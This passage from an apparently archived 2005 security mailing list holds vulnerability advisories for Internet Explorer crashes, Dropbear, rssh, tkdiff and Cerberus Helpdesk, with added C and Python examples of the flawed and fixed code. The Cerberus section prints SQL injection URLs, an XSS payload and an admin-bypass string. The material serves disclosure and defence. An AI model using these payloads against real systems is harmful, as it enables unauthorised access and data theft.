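 * unpredictable name and creates it with O_EXCL.  Returns 1 if a fresh
 * file not accessible to group/other was created; `path` gets its name. */
static int safe_tempfile(const char *dir, char *path, size_t len)
{
    snprintf(path, len, "%s/dhis-tool.XXXXXX", dir);
    int fd = mkstemp(path);
    if (fd < 0)
        return 0;
    struct stat st;
    int ok = fstat(fd, &st) == 0 && (st.st_mode & 077) == 0;
    close(fd);
    return ok;
}

static int teardown(const char *dir, const char *pred, const char *victim,
                    const char *safe)
{
    unlink(safe);
    unlink(pred);
    unlink(victim);
    return rmdir(dir);
}

int main(void)
{
    char dir[128], pred[128], victim[128], safe[128];
    if (setup_scene(dir, pred, victim, sizeof dir) != 0)
        return 1;
    printf("O_EXCL refused the planted link:              %d\n", excl_open(pred));
    printf("fopen(\"w\") on predictable name hit victim:  %d\n",
           unsafe_tempfile(pred, victim));
    printf("mkstemp created a private file:               %d\n",
           safe_tempfile(dir, safe, sizeof safe));
    return teardown(dir, pred, victim, safe) == 0 ? 0 : 1;
}
```

Linux's fs.protected_symlinks sysctl refuses to follow links in sticky world-writable directories such as /tmp when the link's owner differs from both the follower and the directory owner, which blunts the classic /tmp attack but not the pattern itself (non-sticky directories, same-owner links, older kernels). Fix the script; don't rely on the sysctl.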

[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #1

2005-12-27 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #4 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: #7d663471
===

Following HTML code forces M$ IE 6 to crash:
> 

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1128216821765-7d663471.html

These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01293b38 ecx=01293b20 edx=7d74ede0 esi=01293b20
edi= eip=7d663471 esp=0012e89c ebp=0012e89c
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

7d663469 8bff mov edi,edi
7d66346b 55   pushebp
7d66346c 8bec mov ebp,esp
7d66346e 8b4110   mov eax,[ecx+0x10]
FAULT ->7d663471 66833823 cmp word ptr [eax],0x23   
ds:0023:=
7d663475 7405 jz  mshtml+0x1b347c (7d66347c)
7d663477 33c0 xor eax,eax
7d663479 40   inc eax
7d66347a eb1e jmp mshtml+0x1b349a (7d66349a)
7d66347c ff7508   pushdword ptr [ebp+0x8]
7d66347f 8b09 mov ecx,[ecx]
7d663481 83c002   add eax,0x2
7d663484 50   pusheax
7d663485 e8466cebff   callmshtml+0x6a0d0 (7d51a0d0)
7d66348a 8bc8 mov ecx,eax
7d66348c e8ad44fbff call mshtml!CreateHTMLPropertyPage+0x2432c 
(7d61793e)
7d663491 33c9 xor ecx,ecx
7d663493 85c0 testeax,eax
7d663495 0f9cc1   setlcl
7d663498 8bc1 mov eax,ecx
7d66349a 5d   pop ebp
7d66349b c20400   ret 0x4

The access violation results in a null pointer dereference and is not 
exploitable. 

M$ IE parses the attribute value of 'datasrc' ("[n].[m]") in the 
following way:
* Split the attribute value in two parts
* Compare the first char of [n] with 0x23 ('#')

The reason for the crash is that the 0 byte long [n] (no memory is allocated 
for this string) is used without any validation.

For example:
> char *t = NULL;
>
> if (t[0] == 0x23)   /* reads address 0: the same fault as the cmp above */


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
> M$ IE 6.0  - Windoze XP Pro SP2
> M$ IE 6.0  - Windoze 2k SP4
> M$ IE 5.5  - Windoze XP Pro SP2
> M$ IE 5.01 - Windoze XP Pro SP2


o Disclosure Timeline:
=

10 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke <[EMAIL PROTECTED]>

- --

Thomas Waldegger <[EMAIL PROTECTED]>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at http://morph3us.org/
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-1.txt 

-BEGIN PGP SIGNATURE-
Version: n/a   
Comment: http://morph3us.org/

iD8DBQFDrdnDkCo6/ctnOpYRAvLLAKCbjmd+eqqRXDbtfjqNj4ALvJz2aACeM2ZS
i7x/RPte39BmMXHPNZUn2iU=
=6FEe
-END PGP SIGNATURE-
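
The advisory's two parsing steps, as an added C example (not IE's code, and not the HTML PoC, which this page does not reproduce): split the datasrc value "[n].[m]" at the dot, allocate nothing for an empty [n], then compare its first character with '#'. The unchecked comparison is the faulting read; the checked one is the validation the advisory says is missing. The input ".col" is my assumption of a value whose [n] part is empty; the struct and function names are mine.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The two halves of a datasrc value "[n].[m]".  A NULL member means that
 * half was empty and, as the advisory notes for [n], nothing was
 * allocated for it. */
struct datasrc {
    char *n;
    char *m;
};

/* Copies len bytes of s into a fresh string, or returns NULL when len is
 * 0 (the "no memory is allocated for this string" case). */
static char *dup_range(const char *s, size_t len)
{
    if (len == 0)
        return NULL;
    char *p = malloc(len + 1);
    if (p == NULL)
        abort();
    memcpy(p, s, len);
    p[len] = '\0';
    return p;
}

/* Step 1 from the advisory: split the attribute value at the first '.'. */
static void split_datasrc(const char *value, struct datasrc *out)
{
    const char *dot = strchr(value, '.');
    if (dot == NULL) {
        out->n = dup_range(value, strlen(value));
        out->m = NULL;
    } else {
        out->n = dup_range(value, (size_t)(dot - value));
        out->m = dup_range(dot + 1, strlen(dot + 1));
    }
}

/* Step 2, the faulting pattern: compare the first character of [n] with
 * '#' (0x23) without checking that [n] exists.  With n == NULL this reads
 * address 0, which is the `cmp word ptr [eax],0x23` access violation in
 * the dump above (mshtml compares a 16-bit unit; a char suffices here). */
static int is_hash_ref_unchecked(const struct datasrc *d)
{
    return d->n[0] == '#';
}

/* The missing validation: an absent [n] is simply not a '#' reference. */
static int is_hash_ref_checked(const struct datasrc *d)
{
    return d->n != NULL && d->n[0] == '#';
}

static void free_datasrc(struct datasrc *d)
{
    free(d->n);
    free(d->m);
    d->n = d->m = NULL;
}

int main(void)
{
    const char *inputs[] = { "#tbl.col", "tbl.col", ".col" };
    for (size_t i = 0; i < 3; i++) {
        struct datasrc d;
        split_datasrc(inputs[i], &d);
        printf("%-9s checked=%d", inputs[i], is_hash_ref_checked(&d));
        if (d.n != NULL)
            printf(" unchecked=%d\n", is_hash_ref_unchecked(&d));
        else
            printf(" unchecked would fault (n == NULL)\n");
        free_datasrc(&d);
    }
    return 0;
}
```

A read of address 0 is not writable memory in any process, which is why the advisory rates this a crash-only DoS: there is nothing for an attacker to control at that address, only the decision to dereference it.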


[ GLSA 200512-13 ] Dropbear: Privilege escalation

2005-12-27 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200512-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Dropbear: Privilege escalation
  Date: December 23, 2005
  Bugs: #116006
ID: 200512-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow in Dropbear could allow authenticated users to
execute arbitrary code as the root user.

Background
==

Dropbear is an SSH server and client with a small memory footprint.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  net-misc/dropbear   < 0.47>= 0.47

Description
===

Under certain conditions Dropbear could fail to allocate a sufficient
amount of memory, possibly resulting in a buffer overflow.

Impact
==

By sending specially crafted data to the server, authenticated users
could exploit this vulnerability to execute arbitrary code with the
permissions of the SSH server user, which is the root user by default.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Dropbear users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-misc/dropbear-0.47"

References
==

  [ 1 ] CVE-2005-4178
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4178

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200512-13.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


pgpeDA3mdGn7z.pgp
Description: PGP signature


[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2

2005-12-27 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #5 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Read Dereference)  |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: #7d6c74b1
===

Following HTML code forces M$ IE 6 to crash:
> 
>   
> 
> 
> 
> 
> 
> 
> 
> 

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html

These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=0001 edx=012945f0 esi=
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=  efl=0246

7d6c748b 6a0b push0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59   pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8   mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228   mov [edx+0x28],esi
7d6c749c e9af01   jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728   mov eax,[edi+0x28]
7d6c74a4 8b7028   mov esi,[eax+0x28]
7d6c74a7 897728   mov [edi+0x28],esi
7d6c74aa 8b4320   mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24   mov ecx,[esi+0x24]
  ds:0023:0024=
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8   neg ax
7d6c74bf 897510   mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40   inc eax
7d6c74c5 50   pusheax
7d6c74c6 e80c8efeff   callmshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0   movzx   eax,al
7d6c74ce 48   dec eax
7d6c74cf 83f80c   cmp eax,0xc
7d6c74d2 0f877b01 jnbemshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d   jmp dword ptr [mshtml+0x2179c7
  (7d6c79c7)+eax*4]
7d6c74df 8b4e20   mov ecx,[esi+0x20]
7d6c74e2 f6410208 testbyte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz  mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc   mov eax,[ebp-0x4]
7d6c74eb ff7014   pushdword ptr [eax+0x14]
7d6c74ee 8b4610   mov eax,[esi+0x10]
7d6c74f1 03460c   add eax,[esi+0xc]
7d6c74f4 50   pusheax
7d6c74f5 e899ba0100   callmshtml+0x232f93 (7d6e2f93)

It appears to be a null read dereference crash which is not exploitable.


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6 - Win 2k SP4


o Disclosure Timeline:
=

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke <[EMAIL PROTECTED]>

- --

Thomas Waldegger <[EMAIL PROTECTED]>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt 

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-END PGP SIGNATURE-


[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #3

2005-12-27 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ---
| BuHa Security-Advisory #6 |Dec 24th, 2005 |
 ---
| Vendor   | M$ Internet Explorer 6.0   |
| URL  | http://www.microsoft.com/windows/ie/   |
| Version  | <= 6.0.2900.2180.xpsp_sp2  |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---
 
o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or 
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Denial of Service: #7d6d8eba
===

Following HTML code forces M$ IE 6 to crash:
> 

Online-demo: 
http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html

These are the register values and the ASM dump at the time of the access
violation:
eax= ebx=01295390 ecx= edx= esi=0012d230
edi=01290720 eip=7d6d8eba esp=0012cd08 ebp=
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=0246

7d6d8e84 894c2414 mov [esp+0x14],ecx
7d6d8e88 8b8ea400 mov ecx,[esi+0xa4]
7d6d8e8e 24fe and al,0xfe
7d6d8e90 57   pushedi
7d6d8e91 89542410 mov [esp+0x10],edx
7d6d8e95 8954241c mov [esp+0x1c],edx
7d6d8e99 88442420 mov [esp+0x20],al
7d6d8e9d e89912e5ff   callmshtml+0x7a13b (7d52a13b)
7d6d8ea2 8b4c2428 mov ecx,[esp+0x28]
7d6d8ea6 68b2a06e7d   push0x7d6ea0b2
7d6d8eab 8bf8 mov edi,eax
7d6d8ead e89bb7e5ff   callmshtml+0x8464d (7d53464d)
7d6d8eb2 50   pusheax
7d6d8eb3 8bcf mov ecx,edi
7d6d8eb5 e8dfebfdff   callmshtml+0x207a99 (7d6b7a99)
FAULT ->7d6d8eba 668b500c mov dx,[eax+0xc]
  ds:0023:000c=
7d6d8ebe 6685d2   testdx,dx
7d6d8ec1 7c39 jl  mshtml+0x228efc (7d6d8efc)
7d6d8ec3 833d50e3747d01   cmp dword ptr [mshtml+0x29e350
  (7d74e350)],0x1
7d6d8eca 0fbffa   movsx   edi,dx
7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2)
7d6d8ecf a14ce3747d   mov eax,[mshtml+0x29e34c
  (7d74e34c)]
7d6d8ed4 8b484c   mov ecx,[eax+0x4c]
7d6d8ed7 8b4134   mov eax,[ecx+0x34]
7d6d8eda 8d147f   lea edx,[edi+edi*2]
7d6d8edd 8b3c90   mov edi,[eax+edx*4]
7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05)

The access violation results in a null pointer dereference and is not 
exploitable. 


o Vulnerable versions:
=

The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6 - Win 2k SP4


o Disclosure Timeline:
=

26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
17 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.

o Solution:
==

There is no patch yet. The vulnerability will be fixed in an upcoming 
service pack according to the Microsoft Security Response Center.


o Credits:
=

Christian Deneke <[EMAIL PROTECTED]>

- --

Thomas Waldegger <[EMAIL PROTECTED]>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.

Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.

Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt 



Obsidis n1 released!

2005-12-27 Thread angelo
About:
Obsidis is a scientific/underground magazine that focuses on research in ITC 
security. 
The project is managed by Rosiello Security in conjunction with members of 
Packetstorm Security, Astalavista, Information Security Writers, Blacksun and 
Hackers Center who make up the Committee. 

http://www.obsidis.org

Articles released:

*) ARC: A Synchronous Stream Cipher from Hash Functions by Angelo P.E. Rosiello 
& Roberto Carrozzo

*) Demystifying SE Linux by Abhishek Singh

*) DHCP and the Changing Art of Network Security
by James (njan) Eaton-Lee
   
*) Enterprise Security Management by Penetrate
 
*) Internet Protocol: an Introduction by DoZ

*) Preventing Http Session Fixation Attacks by Armando Romeo
 
*) Writing Behind a Buffer by Angelo P.E. Rosiello

We hope you'll have a nice read!

Merry Christmas,
Obsidis staff


Cerberus Helpdesk multiple vulnerabilities.

2005-12-27 Thread A. Ramos
Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.649<->3.2.0pr2)
Problem type: remote
Author: Alejandro Ramos 

Description:
---

Cerberus Helpdesk is a WebGroup Media helpdesk suite based on a PHP environment.
Official webpage: http://www.cerberusweb.com/



Details:
---

support-center:
***

SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind SQL injection
attacks.
Example URL:
   .../support-center/cerberus-support-center/attachment_send.php?file_id=N[SQL]&thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";

XSS:

http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E



cerberus-gui (parser-related):
***

There are a few SQL injections if the XML is maliciously generated:

SQL injections in email_parser.php:

Function: "is_queue_address" (line: 1397) doesn't properly check the
"$addy" value.
 CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode, q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain));

Function: "is_banned_address" (line: 752) doesn't check "$address" properly.
 CODE:
$sql = "SELECT a.address_banned FROM address a WHERE a.address_address = '".$address."'";

Function: "is_admin_address" (line 1532) can be bypassed by using the
following as an email address: "'OR'u.user_superuser'='1'--".
  Example of the resulting query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '' OR u.user_superuser = '1'
 CODE:
$sql = "SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = '$address'";


SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn't check the
following query.
 CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE a.address_address = '" . $a_address . "'";


cerberus-gui:
***

SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270), you can fetch the "superuser" MD5
password with blind SQL injection.
Example URL:

/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4[SQL]
CODE:
  $sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public, k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text, kp.kb_problem_text_is_html, " .
  " ks.kb_solution_text, ks.kb_solution_text_is_html, kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating, k.kb_rating_votes " .
  " FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON (kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id) ".
  " LEFT JOIN knowledgebase_categories kc ON (kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON (k.kb_entry_user=u.user_id) " .
  " WHERE k.kb_id = " . $kbid;


SQL injection in "addresses_export.php":
Example URL:
  POST: /cerberus-gui/addresses_export.php
  sid=c61ce82aa50569705dd774c3366c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
 CODE:
  $sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN thread th ON (t.min_thread_id=th.thread_id)
   LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";

SQL injection in "display.php": "$thread" is not checked.
 CODE:
  $sql = "SELECT th.thread_address_id, a.address_address FROM thread th LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
  "WHERE th.thread_id = " . $thread;

SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
  /cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]

CODE:
  $sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status, t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priority, th.thread_address_id,  ad.address_address, t.queue_addresses_id, q.queue_name " .
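The is_admin_address pattern from this advisory, rebuilt in Python with SQLite as an added example (not Cerberus Helpdesk code): the string-built query next to a bound-parameter version, driven with the address that turns the vulnerable query into the advisory's "Example of the resulting query". The table contents are constructed.

```python
"""Vulnerable-vs-hardened lookup modelled on the is_admin_address pattern.

Added illustration, not Cerberus Helpdesk code: the advisory's query is rebuilt
in Python + SQLite so the effect of pasting the address into the SQL text can be
compared with binding it as a parameter. Table contents are constructed.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: one superuser and one ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (user_id INTEGER, user_email TEXT, user_superuser TEXT)"
    )
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?)",
        [(1, "admin@example.test", "1"), (2, "bob@example.test", "0")],
    )
    return conn


def is_admin_address_vulnerable(conn: sqlite3.Connection, address: str) -> bool:
    """Same shape as the advisory's CODE block: the address becomes SQL text."""
    sql = (
        "SELECT u.user_id FROM user u WHERE u.user_email != '' "
        "AND u.user_email = '" + address + "'"
    )
    return conn.execute(sql).fetchone() is not None


def is_admin_address_fixed(conn: sqlite3.Connection, address: str) -> bool:
    """Hardened form: the address is bound, so quotes inside it stay data."""
    sql = "SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email = ?"
    return conn.execute(sql, (address,)).fetchone() is not None


# The string that turns the vulnerable query into the advisory's resulting query:
#   ... AND u.user_email = '' OR u.user_superuser = '1'
# AND binds tighter than OR, so the superuser row matches regardless of email.
INJECTED_ADDRESS = "' OR u.user_superuser = '1"


def demo() -> dict:
    """Run both variants with a real admin address and with the injected one."""
    conn = build_db()
    return {
        "vulnerable_legit": is_admin_address_vulnerable(conn, "admin@example.test"),
        "vulnerable_injected": is_admin_address_vulnerable(conn, INJECTED_ADDRESS),
        "fixed_legit": is_admin_address_fixed(conn, "admin@example.test"),
        "fixed_injected": is_admin_address_fixed(conn, INJECTED_ADDRESS),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The same fix applies to the numeric cases ($kbid, $thread, $queues): bind the value, and for an IN (...) list generate one placeholder per element instead of splicing the list into the string.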
  

[ GLSA 200512-15 ] rssh: Privilege escalation

2005-12-27 Thread Stefan Cornelius
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200512-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: rssh: Privilege escalation
  Date: December 27, 2005
  Bugs: #115082
ID: 200512-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Local users could gain root privileges by chrooting into arbitrary
directories.

Background
==

rssh is a restricted shell, allowing only a few commands like scp or
sftp. It is often used as a complement to OpenSSH to provide limited
access to users.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  app-shells/rssh   < 2.3.0   >= 2.3.0

Description
===

Max Vozeler discovered that the rssh_chroot_helper command allows local
users to chroot into arbitrary directories.

Impact
==

A local attacker could exploit this vulnerability to gain root
privileges by chrooting into arbitrary directories.

Workaround
==

There is no known workaround at this time.

Resolution
==

All rssh users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-shells/rssh-2.3.0"

References
==

  [ 1 ] CVE-2005-3345
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3345
  [ 2 ] rssh security announcement
http://www.pizzashack.org/rssh/security.shtml

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200512-15.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0




[SECURITY] [DSA 927-1] New tkdiff packages fix insecure temporary file creation

2005-12-27 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 927-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
December 27th, 2005 http://www.debian.org/security/faq
- --

Package: tkdiff
Vulnerability  : insecure temporary file
Problem type   : local
Debian-specific: no
CVE ID : CVE-2005-3343

Javier Fernández-Sanguino Peña from the Debian Security Audit project
discovered that tkdiff, a graphical side by side "diff" utility,
creates temporary files in an insecure fashion.

For the old stable distribution (woody) this problem has been fixed in
version 3.08-3woody0.

For the stable distribution (sarge) this problem has been fixed in
version 4.0.2-1sarge0.

For the unstable distribution (sid) this problem has been fixed in
version 4.0.2-2.

We recommend that you upgrade your tkdiff package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- 

  Source archives:


http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08-3woody0.dsc
  Size/MD5 checksum:  568 f331eee995b5ec3b5346b519c7147ee4

http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08-3woody0.diff.gz
  Size/MD5 checksum: 3685 f00859ddd284e8016728b5a1d00b6fdd

http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08.orig.tar.gz
  Size/MD5 checksum:63171 197e9bee9812a5698889c589efd9b1ee

  Architecture independent components:


http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08-3woody0_all.deb
  Size/MD5 checksum:67308 7314490886f96610a31f71bc22513c7f


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2-1sarge0.dsc
  Size/MD5 checksum:  571 e54f2d9fcd23c386640502fbe119e2b0

http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2-1sarge0.diff.gz
  Size/MD5 checksum: 3973 decabcedfbb5b9fc7dfa8a48b661b563

http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2.orig.tar.gz
  Size/MD5 checksum:86258 c52f7d8d87ebe34fbba6b6bdf30f3c60

  Architecture independent components:


http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2-1sarge0_all.deb
  Size/MD5 checksum:85468 c5fe0c83bfb827e2903a045767f03ded


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/




Secunia Research: IceWarp Web Mail Multiple File Inclusion Vulnerabilities

2005-12-27 Thread Secunia Research
== 

 Secunia Research 27/12/2005

- IceWarp Web Mail Multiple File Inclusion Vulnerabilities  -

== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Secunia........................................................8
